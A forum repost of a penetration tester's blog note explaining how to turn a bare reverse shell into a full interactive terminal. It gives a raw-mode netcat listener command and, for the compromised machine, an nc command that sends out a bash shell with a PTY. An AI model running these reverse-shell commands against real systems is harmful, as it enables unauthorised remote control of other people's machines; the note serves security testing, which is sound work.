搜索
查看: 328|回复: 0

Hacking: Getting a functional TTY from a reverse shell.

[复制链接]

主题

帖子

1万

积分

管理员

积分
发表于 2017-11-17 17:40:04 | 显示全部楼层 |阅读模式
from:https://steemit.com/hacking/@syn ... rom-a-reverse-shell

Note: This is the first in a series of hacking-related posts I'll be writing. My day job is security research/penetration testing, so I figured I'd share some of my notes here...
One of my least favourite things when hacking is dealing with shit reverse connect shells that have no job control, no proper TTY, etc, where I cannot do things like use vim, or su, or send a CTRL+C without either seriously fucking up the shell or just losing the backconnect and having to start from scratch.
This problem could easily be solved simply by uploading, for example, one of my reverse-pty Python scripts (https://github.com/infodox/python-pty-shells), however sometimes the target host is an internet of shit device or just has not got Python installed.
For these situations, I came across a super neat trick that relies entirely on native Linux utilities to pop a functioning PTY shell where you can run "su", use vim, have functioning job control, and hit CTRL+C all day without accidentally killing the shell!
On your listener end, do the following:
  1. stty -echo raw; nc -lp 1337; stty sane
复制代码
reset

The "stty -echo raw" command tells your terminal to not echo characters, and set I/O to raw mode, basically. This is followed by a normal netcat listener, and then a "stty sane" command, which resets your terminal back to normal once the netcat listener exits.
On the other side (the "hacked" computer), we have a few options. The one I use in the screenshot attached is quite simple:
  1. nc -c '/bin/bash -c "script /dev/null"' 127.0.0.1 1337
复制代码